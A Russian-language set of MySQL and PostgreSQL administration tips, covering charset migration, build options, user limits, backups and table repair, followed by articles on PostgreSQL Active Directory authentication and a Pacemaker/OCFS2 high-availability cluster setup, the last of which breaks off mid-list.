Итак, ситуация: - новый db-сервер, с mysql 4.1.7 - необходимость проапгрейдить клиентскую библиотеку на тех серверах которые к нему будут обращаться. - необходимость миграции данных с других mysql, которые 4.0 - базы все в cp1251 В качестве эксперимента апгрейдим mysql-client до 4.1.7 на первом db-сервере, где стоит 4.0.20 и отпадание mysql-client'а на, пусть даже час, ни к чему фатальному не приведет... На первый взгляд все гладко заапгрейдилось. Вечером апгрейдим Mysql-client где надо, чего надо пересобираем... пока все гладко. Начинаем миграцию данных, с того сервера где мы обновили Mysql-client в первую очередь. Маленькая ремарка: mysql-(client|server) были собраны из портов с WITH_LINUXTHREADS=yes BUILD_STATIC=yes BUILD_OPTIMIZED=yes , т.е. с чарсетами по-умолчанию - делаем дамп командой mysqldump --opt database > database.sql - копируем дамп на новый сервер - там в /etc/my.cnf уже прописано в [mysqld] default-character-set=cp1251. - говорим create database db_name - потом \. database.sql - дамп разворачивается, но... с матами на дублирование ключа и с вопросиками в место русских буковок. - пробуем set names cp1251 и снова развернуть дамп - та же история. Потом пол-дня пробуем всякие разные комбинации с пересборкой mysql-server и всякими настройками charset/collation, в результате удосуживаемся присмотреться к дампу и увидеть там 'SET NAMES utf8' в самом начале. После замены оного на 'set names cp1251', все встало на свои места. Этот "set names utf8" появился когда новый mysqldump из mysql-client-4.1.7 взялся дампить базу с cp1251 и, не получив информацию о collation/charset выставил то, что считал разумным - utf8. Лечится созданием дампа с --skip-set-charset.

FreeBSD 5.3 + MySQL на сервере с несколькими CPU Автор: Z [комментарии]

Для оптимизации выполнения данной БД на сервере с несколькими процессорами (и hyperthreding) после конфигурирования FreeBSD c SMP рекомендую поставить linuxthreads и собрать MySQL с его поддержкой. Вот параметры для MySQL: env CC=gcc CFLAGS="-O3 -pipe -march=pentiumpro -D__USE_UNIX98 -D_REENTRANT \ -D_THREAD_SAFE -DHAVE_BROKEN_REALPATH -I/usr/local/include/pthread/linuxthreads " \ CXX=gcc CXXFLAGS="-O3 -pipe -march=pentiumpro -felide-constructors \ -D__USE_UNIX98 -D_REENTRANT -D_THREAD_SAFE \ -DHAVE_BROKEN_REALPATH -I/usr/local/include/pthread/linuxthreads " \ ./configure \ --prefix=/usr/local/mysql \ --with-mysqld-user=dbuser \ --with-charset=koi8_ukr \ --with-innodb \ --with-extra-charsets=none \ --without-isam \ --with-mysqld-user=dbuser \ --enable-assembler \ --mandir=/usr/local/man \ --with-mysqld-ldflags=-all-static \ --with-mit-threads=no \ --enable-thread-safe-client \ --disable-shared \ --without-debug \ --without-readline \ --without-bench \ --without-extra-tools \ --with-mysqlfs \ --with-vio \ --with-named-thread-libs="-DHAVE_GLIBC2_STYLE_GETHOSTBYNAME_R \ -D_THREAD_SAFE -DHAVE_BROKEN_REALPATH -I/usr/local/include/pthread/linuxthreads \ -L/usr/local/lib -llthread -llgcc_r -llstdc++ -llsupc++" \ --with-libwrap

Ограничение пользователей в MySQL (доп. ссылка 1) [обсудить]

MySQL 3.23.x, /etc/my.cnf, блок " [mysqld]": set-variable = max_connections=20 # Максимальное число одновременных коннектов к серверу set-variable = max_user_connections=5 # Макс. число одновременных коннектов от одного пользователя set-variable = connect_timeout=2 Для MySQL 4.x для простых баз имеет смысл использовать опцию skip-innodb для существенной экономии памяти. В MySQL 4.x для конкретного пользователя можно установить следующие лимиты: GRANT ... WITH MAX_QUERIES_PER_HOUR N1 MAX_UPDATES_PER_HOUR N2 MAX_CONNECTIONS_PER_HOUR N3; , где: N1 - Количество всех запросов в час; N2 - Количество всех обновлений/изменений в час; N3 - Количество соединений, сделанных за час. Для просмотра содержимого бинарного лога запросов нужно использовать утилиту mysqlbinlog.

Как посмотреть список таблиц и их структуру в MySQL [комментарии]

SHOW DATABASES; - список баз данных SHOW TABLES [FROM db_name]; - список таблиц в базе SHOW COLUMNS FROM таблица [FROM db_name]; - список столбцов в таблице SHOW CREATE TABLE table_name; - показать структуру таблицы в формате "CREATE TABLE" SHOW INDEX FROM tbl_name; - список индексов SHOW GRANTS FOR user [FROM db_name]; - привилегии для пользователя. SHOW VARIABLES; - значения системных переменных SHOW [FULL] PROCESSLIST; - статистика по mysqld процессам SHOW STATUS; - общая статистика SHOW TABLE STATUS [FROM db_name]; - статистика по всем таблицам в базе

Как изменить пароль для пользователя в MySQL [комментарии]

Свой пароль можно поменять через: SET PASSWORD = PASSWORD('пароль') Пароль определенного пользователя можно поменять через: SET PASSWORD FOR логин@localhost = PASSWORD('пароль'); SET PASSWORD FOR логин@"%" = PASSWORD('пароль'); тоже самое делают: UPDATE mysql.user SET Password=PASSWORD('пароль') WHERE User='логин' AND Host='localhost'; FLUSH PRIVILEGES; или GRANT USAGE ON БД.* TO логин@localhost IDENTIFIED BY 'пароль'; или mysqladmin -u логин password пароль

Как оптимизировать выполнение INSERT запросов в MySQL (доп. ссылка 1) [обсудить]

Для того чтобы INSERT операции не влияли на производительность SELECT запросов используют конструкции: "INSERT DELAYED" и "INSERT LOW_PRIORITY" (UPDATE LOW_PRIORITY) Позволяют отложить включение данных до тех пор, пока не завершаться текущие операции чтения из базы, при том, что если накопилось несколько "DELAYED", то данные будут добавлены одним блоком. При DELAYED управление возвращается сразу, LOW_PRIORITY возвращает управление только после завершения записи. Для увеличения скорости выполнения большого числа INSERT/UPDATE/DELETE рекомендуется группировать несколько операторов в рамках одного лока или транзакции: LOCK TABLES table WRITE; (BEGIN;) INSERT'ы ...... (но не много, чтобы не столкнуться с deadlock) UNLOCK TABLES; (COMMIT;)

Как посмотреть статистику работы PostgreSQL и MySQL [обсудить]

Чем сейчас занимается SQL сервер: MySQL: mysqladmin processlist PostgreSQL: select * from pg_stat_activity; select * from pg_stat_database; Общая статистика по работе сервера: MySQL: mysqladmin extended-status; mysqladmin status PostgreSQL: select * from pg_stats;

Как увеличить производительность выполнения mysqldump (доп. ссылка 1) [комментарии]

При дампе очень больших таблиц mysqldump пытается использовать очень большой объем ОЗУ. Чтобы он этого не делал нужно использовать опцию "-q".

Как определить и исправить повреждение MySQL базы. [обсудить]

Для тестирования повреждений рекомендуется выполнять: myisamchk tables[.MYI] Параметры уровня проверки: --medium-check - средний --extend-check - расширенный В crontab: 35 0 * * 0 /usr/local/mysql/bin/myisamchk --fast --silent /path/to/datadir/*/*.MYI Внимание, myisamchk нужно запускать при _не_ запущенном mysqld, иначе нужно использовать утилиту mysqlcheck (mysqlcheck --repair --analyze --optimize --all-databases --auto-repair) Восстановление таблицы: REPAIR TABLE tbl_name или myisamchk -r table_name или myisamchk --safe-recover table_name

Как произвести оптимизацию хранилища в MySQL (аналог vacuum в psql) [обсудить]

Почистить "дырки" (дефрагментация), обновить статистику и отсортировать индексы: OPTIMIZE TABLE имя_таблицы; или использовать: myisamchk --quick --check-only-changed --sort-index --analyze Внимание, myisamchk нужно запускать при _не_ запущенном mysqld, иначе нужно использовать утилиту mysqlcheck (mysqlcheck --repair --analyze --optimize --all-databases --auto-repair) Апдейт статистики оптимизатора: ANALYZE TABLE имя_таблицы; или использовать: myisamchk --analyze Рекомендуется регулярно выполнять: isamchk -r --silent --sort-index -O sort_buffer_size=16M db_dir/*.ISM myisamchk -r --silent --sort-index -O sort_buffer_size=16M db_dir/*.MYI

Советы по бэкапу данных в MySQL [комментарии]

Бэкап структуры: mysqldump --all --add-drop-table [--all-databases] --force [--no-data] [-c] \ --password=password --user=user [база] [таблицы] > backup_file ( -c - формировать в виде полных INSERT. --all-databases - бэкап всех баз, --no-data - бэкап только структуры таблиц в базах, [таблицы] - бэкапить только указанные таблицы.) Восстановление: mysql < backupfile (для прямой вставки из текстового файла можно воспользоваться mysqlimport) (для анализа структуры базы, например, списка таблиц: mysqlshow <база>)

Как обеспечить корректную работу MySQL с русскими символами при сортировке и выборке данных. [комментарии]

В /etc/my.cnf вписать в блоке [mysqld]: default-character-set=koi8_ru (или cp1251) При работе с базой можно выставить рабочую кодировку через: SET CHARACTER SET koi8_ru

Как добавить нового пользователя или БД в MySQL [комментарии]

GRANT ALL PRIVILEGES ON БД.* TO пользователь@localhost IDENTIFIED BY 'пароль'; GRANT SELECT,INSERT,UPDATE,DELETE,CREATE,DROP PRIVILEGES ON БД.таблица TO пользователь@'%.domain.ru' IDENTIFIED BY 'пароль'; или insert into user (host,user,password) values ('localhost', 'пользователь', password('пароль')); insert into db (Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv, Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv) values ('localhost','БД','пользователь','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'); flush privileges; или воспользоваться скриптом mysql_setpermission

Как изменить забытый MySQL административный пароль [обсудить]

1. перезапустить mysqld с опцией --skip-grant-tables 2. mysqladmin -h хост -u пользователь password 'новый пароль'

PostgreSQL специфика

PlPerl и PlSQL

Оптимизация и администрирование PostgreSQL

Настройка СУБД Postgresql для аутентификации пользователей через Active Directory Автор: Slonik [комментарии]

В статье расскажу про мой опыт настройки СУБД Postgresql для включения аутентификации пользователей через Active Directory с помощью протокола GSSAPI. Предполагается, что домен Active Directory и БД Postgresql уже развёрнуты. Для примера у меня развёрнут тестовый стенд со следующими параметрами:
Сервер с Active Directory: Windows Server 2022
Функциональный уровень домена: Windows Server 2016
Имя домена: domain.test
Контроллер домена: dc.domain.test
Клиентский компьютер с Windows 11, присоединённый к домену
Сервер с БД Postgresql 13 на Debian 11
DNS имя сервера СУБД: pg-host.domain.test Установка пакетов на сервере СУБД Для систем на базе Debian: root# apt install krb5-user postgresql Настройка Kerberos на сервере СУБД В файле /etc/krb5.conf на сервере с СУБД Postgresql добавляем описание для области Kerberos домена Windows: [libdefaults] default_realm = DOMAIN.TEST ... [realms] DOMAIN.TEST = { kdc = dc.domain.test admin_server = dc.domain.test } Проверяем, что можем получить билет: user@pg-host:~$ kinit Administrator@DOMAIN.TEST Смотрим список полученных билетов на сервере с БД: user@pg-host:~$ klist Ticket cache: FILE:/tmp/krb5cc_0 Default principal: Administrator@DOMAIN.TEST Valid starting Expires Service principal 23.07.2022 20:55:44 24.07.2022 06:55:44 krbtgt/DOMAIN.TEST@DOMAIN.TEST renew until 24.07.2022 20:55:38 Настройка описания имени службы в Active Directory Настройка пользователя Active Directory Для того, чтобы пользователи могли подключаться к СУБД с помощью GSSAPI, в Active Directory должна быть учётная запись с соответствующей записью уникального описания службы в поле Service Principal Name и User Principal Name: servicename/hostname@REALM. Значение имени сервиса servicename по умолчанию postgres и может быть изменено во время сборки Postgresql с помощью параметра with-krb-srvnam ./configure --with-krb-srvnam=whatever
hostname - это полное доменное имя сервера, где работает СУБД (pg-host.domain.test) оно должно быть зарегистрировано в DNS сервере, который использует Active Directory.
realm - имя домена (DOMAIN.TEST) В моём примере имя службы получается: postgres/pg-host.domain.test@DOMAIN.TEST Создаём пользователя pg-user в Active Directory, указываем "Запретить смену пароля пользователей" и "Срок действия пароля не ограничен". Создание файла с таблицами ключей Для того, чтобы служба СУБД могла подключаться к Active Directory без ввода пароля, необходимо создать файл keytab на сервере с Windows Server и после переместить его на сервер c СУБД. Создание файла выполняется с помощью команды ktpass.exe: ktpass.exe -princ postgres/pg-host.domain.test@DOMAIN.TEST -ptype KRB5_NT_PRINCIPAL -crypto ALL -mapuser pg-user@domain.test -pass <пароль> -out %tmp%\krb5.keytab Эта же команда выполняет привязку имени сервиса к учётной записи. Подключаемся к СУБД Postgresql и определяем, где СУБД предполагает наличие файла keytab: postgres@pg-host:~$ psql postgres=# show krb_server_keyfile; FILE:/etc/postgresql-common/krb5.keytab Копируем файл с Windows Server на сервер с СУБД в указанное место. Если файл необходимо расположить в другом месте, то необходимо поменять параметр krb_server_keyfile: sql> alter system set krb_server_keyfile=''/path''; Настройка Postgresql Настройка файла доступа pg_hba.conf и файла сопоставления имён pg_ident.conf В файле pg_ident.conf описываем сопоставление пользователей Active Directory с пользователями БД: # MAPNAME SYSTEM-USERNAME PG-USERNAME gssmap /^(.*)@DOMAIN\.TEST$ \1 Данное сопоставление указывает отображать доменного пользователя user@DOMAIN.TEST в пользователя БД user (для подключения, пользователь user уже должен быть создан в БД). В файле pg_hba.conf указываем, например, что использовать аутентификацию с помощью GSSAPI необходимо только для пользователей, состоящих в группе krb_users и подключающихся из сети 192.168.1.0/24: host all +krb_users 192.168.1.0/24 gss include_realm=1 krb_realm=DOMAIN.TEST map=gssmap Здесь:
map=gssmap - имя сопоставления из файла pg_ident.conf
krb_realm - имя домена Active Directory Создание пользователей Создаём пользователей в Active Directory: user1, user2. Создаём пользователей в СУБД: postgres=# create role user1 login; postgres=# create role user2 login; postgres=# create role user3 login encrypted password ''пароль'' ; Создаём группу krb_users (как файле pg_hba.conf) и добавляем необходимых пользователей в неё: postgres=# grant krb_users to user1; postgres=# grant krb_users to user2; В данном случае, пользователи user1, user2 смогут подключится к СУБД через GSSAPI, используя учётные данные из Active Directory, а пользователь user3 сможет подключиться только с указанием пароля, хранящимся в БД. Проверка подключения На Windows машине проверяем подключение. Входим на компьютер с Windows через Active Directory, например, как user1@domain.test. Запускаем клиент postgresql, в строке подключения указываем полное доменное имя сервера СУБД, как прописано в файле keytab - pg-host.domain.test, логин и пароль не указываем: C:\> chcp 1251 C:\> psql -h pg-host.domain.test -d postgresql Смотрим список билетов Kerberos: C:\> klist.exe #2> Клиент: user1 @ DOMAIN.TEST Сервер: postgres/pg-host.domain.test @ DOMAIN.TEST Тип шифрования KerbTicket: RSADSI RC4-HMAC(NT) флаги билета 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Время начала: 7/24/2022 11:22:54 (локально) Время окончания: 7/24/2022 20:59:53 (локально) Время продления: 7/24/2022 10:59:53 (локально) Тип ключа сеанса: RSADSI RC4-HMAC(NT) Флаги кэша: 0 Вызванный центр распространения ключей: dc.domain.test Проверяем подключение пользователя user3 с помощью пароля: C:\> psql -h pg-host.domain.test -d postgresql -U user3 Как видно аутентификация в СУБД работает успешно как с помощью Active Directory, так и через пароль, хранящийся в БД.

Настройка СУБД PostgreSQL 13 под управлением Pacemaker/Corosync в Debian 11 Автор: Slonik [комментарии]

В статье расскажу про мой опыт настройки Postgresql для работы под контролем кластерной службы Pacemaker Под нагрузкой данное решение не проверялось, всегда делайте (и проверяйте) резервные копии. Для хранения базы данных будет рассмотрен пример использования кластерной файловой системе OCFS2. Версии ПО, использованные в примере:
OCFS2 - драйвер из ядра 5.10, утилиты ocfs2-tools - 1.8.6
Corosync - 3.1.2
Pacemaker - 2.0.5
Postgresql 13 В статье будет три типа кластеров:
кластер файловой системы OCFS2 - обеспечивает хранение файлов на общем диске и согласованную работу с ними
кластер Corosync/Pacemaker - обеспечивает отслеживание работы процессов СУБД, запуск виртуального ip-адреса СУБД
кластер баз данных Postgresql - набор баз, управляемых одним экземпляром работающего сервера СУБД Подготовка операционных систем Для устойчивой работы кластеров (OCFS2, Pacemaker/Corosync) необходимо как минимум три сервера. Сервера могут быть как физические так и виртуальные. Желательно, чтобы сервера имели одинаковые характеристики производительности. Я для демонстрации подготовил три виртуальные машины с помощью Qemu-KVM. Устанавливаем ОС Debian 11 на каждый из серверов в минимальной конфигурации. Настройка сети В примере у меня будут сервера с адресами:
node1 - ip 192.168.1.11
node2 - ip 192.168.1.12
node3 - ip 192.168.1.13 Имена узлов должны разрешаться в IP-адреса на каждом из серверов, для этого необходимо прописать сопоставление в файле /etc/hosts или создать записи на DNS-сервере. root:~# cat /etc/hosts 127.0.0.1 localhost 192.168.1.11 node1.local node1 192.168.1.12 node2.local node2 192.168.1.13 node3.local node3 В случае реальной реализации кластера, сетевых карт на каждом из серверов должно быть как минимум две - карты необходимо объединить в логическое устройство bonding или teaming. Физически карты должны подключаться к двум независимым коммутаторам. В примере у меня будет по одной сетевой карте на сервер. Настройка сетевого экрана Выполняем настройку экрана на каждом узле:
устанавливаем пакет для управления брандмауэром ufw
создаём разрешающие правила для ssh, postgres, узлов кластера
активируем правила root# apt install ufw root# ufw allow ssh root# ufw allow postgres root# ufw allow from 192.168.1.11 to any root# ufw allow from 192.168.1.12 to any root# ufw allow from 192.168.1.13 to any root# ufw enable Кластер OCFS2 для отслеживания работы узлов по-умолчанию использует протокол TCP порт 7777 (задаётся в файле /etc/ocfs2/cluster.conf), а Corosync - протокол UDP, порт 5405 (задаётся в файле /etc/corosync/corosync.conf), с учётом этого, можно настроить более тонкие правила брандмауэра: root# ufw allow proto tcp from 192.168.1.11 to any port 7777 root# ufw allow proto tcp from 192.168.1.12 to any port 7777 root# ufw allow proto tcp from 192.168.1.13 to any port 7777 root# ufw allow proto udp from 192.168.1.11 to any port 5405 root# ufw allow proto udp from 192.168.1.12 to any port 5405 root# ufw allow proto udp from 192.168.1.13 to any port 5405 Настройка дисковой системы На каждом сервере будет индивидуальный диск для системы (/dev/vda, 20 Гб) и общий диск на все сервера для хранения БД (/dev/vdb, 5 Гб): root# lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT vda 254:0 0 20G 0 disk ├─vda1 254:1 0 512M 0 part /boot/efi ├─vda2 254:2 0 18,5G 0 part / └─vda3 254:3 0 976M 0 part [SWAP] vdb 254:16 0 5G 0 disk /mnt/ocfs2clst Настройка кластерной файловой системы Для реального использования общий диск должен быть расположен на системе хранения данных, и подключатся к серверам по нескольким путям. Для демонстрации общий диск будет реализован с помощью средств Qemu-KVM. Настройка службы кластера ФС OCFS2 Настройка ядра Linux Необходимо изменить параметры ядра, чтобы сервер автоматически перезагружался при сбое кластерной ФС, для это нужно создать файл /etc/sysctl.d/10-ocfs2.conf kernel.panic_on_oops = 1 kernel.panic = 30 После применить параметры: root# systemctl restart systemd-sysctl Данные настройки указывают ядру Linux при возникновении сбоя (когда связь по сети пропала, но узел продолжает запись heartbeat сообщений на общий диск) автоматически перезагрузить узел через 30 секунд. Установка пакетов OCFS2 Устанавливаем пакеты на каждом из узлов root# apt install ocfs2-tools Настройка кластера ФС OCFS2 Все настройки кластера OCFS2 хранятся в файле /etc/ocfs2/cluster.conf. Нужно либо выполнить команды на каждом узле кластера, либо выполнить на одном узле и после скопировать файл /etc/ocfs2/cluster.conf на каждый узел, а после выполнить регистрацию и запуск. Создаём кластер (выполнить на каждом узле кластера) root# o2cb add-cluster ocfs2clst Добавляем узлы в кластер (выполнить на каждом узле кластера), имя узла должно совпадать с тем, что выдаёт команда hostname root# o2cb add-node --ip 192.168.1.11 --port 7777 --number 1 ocfs2clst node1 root# o2cb add-node --ip 192.168.1.12 --port 7777 --number 2 ocfs2clst node2 root# o2cb add-node --ip 192.168.1.13 --port 7777 --number 3 ocfs2clst node3 Регистрируем кластер (выполнить на каждом узле кластера) root# o2cb register-cluster ocfs2clst Включаем кластер (выполнить на каждом узле кластера) root# o2cb start-heartbeat ocfs2clst Выполняем настройку драйвера ФС (обязательно выполнить на каждом узле кластера) root# dpkg-reconfigure ocfs2-tools Запускать кластер OCFS2 (O2CB) во время загрузки компьютера?: Y Имя кластера, запускаемого во время загрузки компьютера: ocfs2clst Настройки драйвера хранятся в файле /etc/default/o2cb Содержимое файла: # O2CB_ENABLED: 'true' means to load the driver on boot. O2CB_ENABLED=true # O2CB_BOOTCLUSTER: If not empty, the name of a cluster to start. O2CB_BOOTCLUSTER=ocfs2clst # O2CB_HEARTBEAT_THRESHOLD: Iterations before a node is considered dead. O2CB_HEARTBEAT_THRESHOLD=31 # O2CB_IDLE_TIMEOUT_MS: Time in ms before a network connection is considered dead. O2CB_IDLE_TIMEOUT_MS=30000 # O2CB_KEEPALIVE_DELAY_MS: Max. time in ms before a keepalive packet is sent. O2CB_KEEPALIVE_DELAY_MS=2000 # O2CB_RECONNECT_DELAY_MS: Min. time in ms between connection attempts. O2CB_RECONNECT_DELAY_MS=2000 Создание ФС OCFS2 Можно создать разделы на кластерном томе и создавать ФС уже на разделе, но это добавит сложностей при расширении тома, так как придётся вручную править границы раздела с помощью parted/fdisk и после расширять ФС. Но у нас кластерный том планируется целиком отдать под работу СУБД Postgresql, поэтому ФС предлагаю создать сразу на всем томе (в примере это диск /dev/vdb). Выполняем форматирование общего тома на одном из узлов: root# mkfs.ocfs2 -L pg-data --cluster-name=ocfs2clst -N 5 -T datafiles --fs-feature-level=max-features --cluster-stack=o2cb /dev/vdb Описание параметров:
-L pg-data - метка ФС
--cluster-name=ocfs2clst - имя кластера OCFS2, который управляет ФС
-N 5 - максимальное количество узлов, которые могут работать одновременно с ФС, позже можно поменять с помощью tunefs.ocfs2, но рекомендуется создавать структуру заранее
-T datafiles - тип хранимых данных, может быть mail, datafiles, vmstore
--fs-feature-level=max-features - включаем все доступные возможности ФС, т.к. узлы у нас идентичные
--cluster-stack=o2cb - используем для управления ФС стандартный стек o2cb Проверяем, что метки новой ФС видны на всех узлах кластера: root# blkid /dev/vdb /dev/vdb: LABEL="pg-data" UUID="ce92b1e7-30cb-4883-9a92-57c986f76acd" BLOCK_SIZE="4096" TYPE="ocfs2" Вывод команды blkid на всех узлах кластера должен совпадать. Выполняем пробное монтирование Монтирование выполняется 20-30 секунд, так как требует согласования по сети. Выполняем команды на всех узлах кластера. root# mkdir /mnt/ocfs2clst root# mount /dev/disk/by-uuid/ce92b1e7-30cb-4883-9a92-57c986f76acd /mnt/ocfs2clst Команда mounted.ocfs2 показывает на каких узлах смонтирована ФС. root# mounted.ocfs2 -f Device Stack Cluster F Nodes /dev/vdb o2cb ocfs2clst node1, node2, node3 Создаём пробные файлы/папки в каталоге /mnt/ocfs2clst на одном из узлов и проверяем, что они видны на остальных узлах кластера OCFS2. Размонтируем ФС на каждом узле: root# umount /mnt/ocfs2clst Расширение ФС OCFS2 Если потребуется увеличить размер хранилища:
Увеличиваем размер тома на СХД
Пересканируем том на сервере или перезагружаем узлы кластера
Расширяем ФС root# tunefs.ocfs2 -S /dev/vdb Добавление узла в кластер OCFS2 Если потребуется добавить ещё узел (например, node4, с ip 192.168.1.14) в кластер OCFS2, то необходимо выполнить команду на каждом узле: root# o2cb_ctl -C -i -n node4 -t node -a number=4 -a ip_address=192.168.1.14 -a ip_port=7777 -a cluster=ocfs2clst Необходимо заметить, что для обеспечения кворума, количество узлов должно быть нечётным. Установка PostgreSQL Устанавливаем пакеты на все узлы кластера: root# apt install postgresql Отключаем службу на каждом узле кластера, т.к. запуском СУБД будет управлять Pacemaker root# systemctl disable postgresql Настройка Pacemaker/Corosync Установка пакетов root# apt install pacemaker corosync crmsh fence-agents Настройка Corosync Служба Corosync обеспечивает обмен сообщениями между узлами кластера, с помощью неё отслеживается, что узлы работают корректно. А уже на основании информации о том какие узлы доступны, служба Pacemaker принимает решение о запуске сервисов (запуск виртуальных ip-адресов, монтирование файловых систем, запуск процессов СУБД). Настройки Corosync хранятся в файле /etc/corosync/corosync.conf. Рабочий пример файла указан ниже: # Please read the corosync.conf.5 manual page totem { version: 2 cluster_name: pgclst crypto_cipher: aes256 crypto_hash: sha256 } logging { fileline: off to_stderr: yes to_logfile: yes logfile: /var/log/corosync/corosync.log to_syslog: yes debug: off logger_subsys { subsys: QUORUM debug: off } } quorum { provider: corosync_votequorum } nodelist { node { name: node1 nodeid: 1 ring0_addr: 192.168.1.11 } node { name: node2 nodeid: 2 ring0_addr: 192.168.1.12 } node { name: node3 nodeid: 3 ring0_addr: 192.168.1.13 } } Включение шифрования сообщений Corosync Для повышения безопасности можно включить шифрование служебных сообщений при обмене между узлами кластера. Для этого на одном из узлов необходимо выполнить команду: root# corosync-keygen Она создаст файл /etc/corosync/authkey, этот файл необходимо скопировать на другие узлы кластера. root@node1:~# scp /etc/corosync/authkey root@node2:/etc/corosync/authkey root@node1:~# scp /etc/corosync/authkey root@node3:/etc/corosync/authkey В файле настроек /etc/corosync/corosync.conf необходимо задать параметры crypto_cipher и crypto_hash в секции totem: totem { ... crypto_cipher: aes256 crypto_hash: sha256 ... } Если вам необходимо разместить файл-ключ по не стандартному пути, то расположение можно указать с помощью директивы keyfile. После изменений необходимо перезапустить службы на каждом узле: root# systemctl restart corosync pacemaker Параметры узлов кластера Corosync Для работы кластера необходимо указать список узлов. Это делается в секции nodelist. nodelist { node { name: node1 nodeid: 1 ring0_addr: 192.168.1.11 } node { name: node2 nodeid: 2 ring0_addr: 192.168.1.12 } node { name: node3 nodeid: 3 ring0_addr: 192.168.1.13 } } После настройки, копируем файл /etc/corosync/corosync.conf на остальные узлы. Перезагружаем все узлы кластера и проверяем работу службы corosync с помощью команд corosync-quorumtool и crm_mon root@node1:~# corosync-quorumtool -s Quorum information ------------------ Date: Thu Jul 14 21:09:17 2022 Quorum provider: corosync_votequorum Nodes: 3 Node ID: 1 Ring ID: 1.139 Quorate: Yes Votequorum information ---------------------- Expected votes: 3 Highest expected: 3 Total votes: 3 Quorum: 2 Flags: Quorate Membership information ---------------------- Nodeid Votes Name 1 1 node1 (local) 2 1 node2 3 1 node3 root@node1:~# crm_mon -1 Cluster Summary: * Stack: corosync * Current DC: node3 (version 2.0.5-ba59be7122) - partition with quorum * Last updated: Thu Jul 14 21:11:18 2022 * Last change: Thu Jul 14 20:24:25 2022 by root via cibadmin on node1 * 3 nodes configured * 0 resource instances configured Node List: * Online: [ node1 node2 node3 ] Настройка Pacemaker Ресурсы Pacemaker описываются через XML-файлы, я вместо ручного написания xml-объектов буду использовать crm (CRM shell), где параметры ресурсов можно задать в виде аргументов. Смена имени кластера Ранее мы создали кластер OCFS2 с именем ocfs2clst, кластер Corosync с именем pgclst, теперь укажем имя кластера Pacemaker. После установки, имя кластера Pacemaker, обычно debian, поменяем его также на pgclst: root# crm_attribute --query --name=cluster-name scope=crm_config name=cluster-name value=debian root# crm_attribute --type crm_config --name cluster-name --update pgclst Параметры по-умолчанию Меняем параметры по-умолчанию для новых ресурсов:
resource-stickiness - "липучесть" ресурса к текущему расположению в кластере (по-умолчанию 0), или "стоимость" переноса ресурса на другой узел. При увеличении значения, pacemaker будет стараться восстановить состояние сбойного ресурса на том же узле, при малом значении - предпочтёт восстановить ресурс запуском на других узлах. root# crm_attribute --type rsc_defaults --name resource-stickiness --update 10
migration-threshold - кол-во сбоев ресурса на узле, при превышении которого происходит миграция на другой узел root# crm_attribute --type rsc_defaults --name migration-threshold --update 2 Ассиметричный кластер Можно указать, что для запуска каких-либо ресурсов необходимо наличие явного разрешающего правила. Это может понадобиться если не все узлы кластера идентичны по характеристикам: root# crm_attribute -n symmetric-cluster -v false После включения для каждого ресурса будет необходимо создать правила. crm conf location <имя правила> <имя ресурса> <приоритет>: <узел> Например, для ресурса виртуального ip-адреса (ip-pgclst) можно указать, что c приоритетом 100 он будет размещаться на узле node1, с приоритетом 10 - на узле node2, а на узле node3 его запуск будет запрещён (приоритет -infinity ): root~# crm conf crm(live)configure# location loc-ip-1 ip-pgclst 100: node1 crm(live)configure# location loc-ip-2 ip-pgclst 10: node2 crm(live)configure# location loc-ip-3 ip-pgclst -inf: node3 Изоляция узлов (stonith) В Pacemaker для каждого узла необходимо указать метод изоляции (fencing) в случае сбоя сетевой доступности. Осуществляется изоляция с помощью stonith ресурсов. Это могут быть программы для отключения питания на UPS, программы, которые подключаются к гипервизору и принудительно завершают работу виртуальной машины (нашего узла кластера) и много других вариантов. Без STONITH устройств Pacemaker откажется запускать ресурсы: root:~# crm_verify -L -V (unpack_resources) error: Resource start-up disabled since no STONITH resources have been defined (unpack_resources) error: Either configure some or disable STONITH with the stonith-enabled option (unpack_resources) error: NOTE: Clusters with shared data need STONITH to ensure data integrity Errors found during check: config not valid Список устройств для изоляции можно узнать из команды: root# stonith_admin --list-installed Параметры, необходимые устройству для работы, можно узнать: root# stonith -t <имя устройста stonith> -n Простейшие stonith ресурсы можно создать так. Ресурс-пустышка dummy - ничего не отключает: root# crm conf primitive sh-dummy stonith:null params hostlist="192.168.1.11 192.168.1.12 192.168.1.13" root# crm conf clone fency sh-dummy SSH-stonith - пытается подключиться к сбойному узлу через SSH и запланировать выключение через службу at (должна быть установлена на всех узлах). root# apt install at root# crm conf primitive fence-ssh stonith:ssh params hostlist="192.168.1.11 192.168.1.12 192.168.1.13" root# crm conf clone fency fence-ssh Имитируем сбой на узле node3: root# stonith -t ssh -p "node1 node2 node3" -T reset node3 Для тестирования может понадобится отключение STONITH (НЕ РЕКОМЕНДУЕТСЯ): root~# crm_attribute -n stonith-enabled -v false Очистить ошибки можно командой: root# stonith_admin --cleanup --history=node3 Стоит заметить что, в случае сбоя сети, кроме STONITH устройств, узел кластера может перезагрузить служба OCFS2. Если у какого-либо узла пропадёт связь с другими узлами, но он продолжит посылать heartbeat сообщения на кластерный диск, то через 30 секунд (значение sysctl kernel.panic = 30) этот узел будет перезагружен принудительно. Настройка PostgreSQL для работы под управлением Pacemaker/Corosync Для запуска PostgreSQL необходимо создать три ресурса:
Ресурс, который будет монтировать ФС, где расположена БД
Ресурс виртуального ip-адреса, по которому будут обращаться клиенты к СУБД
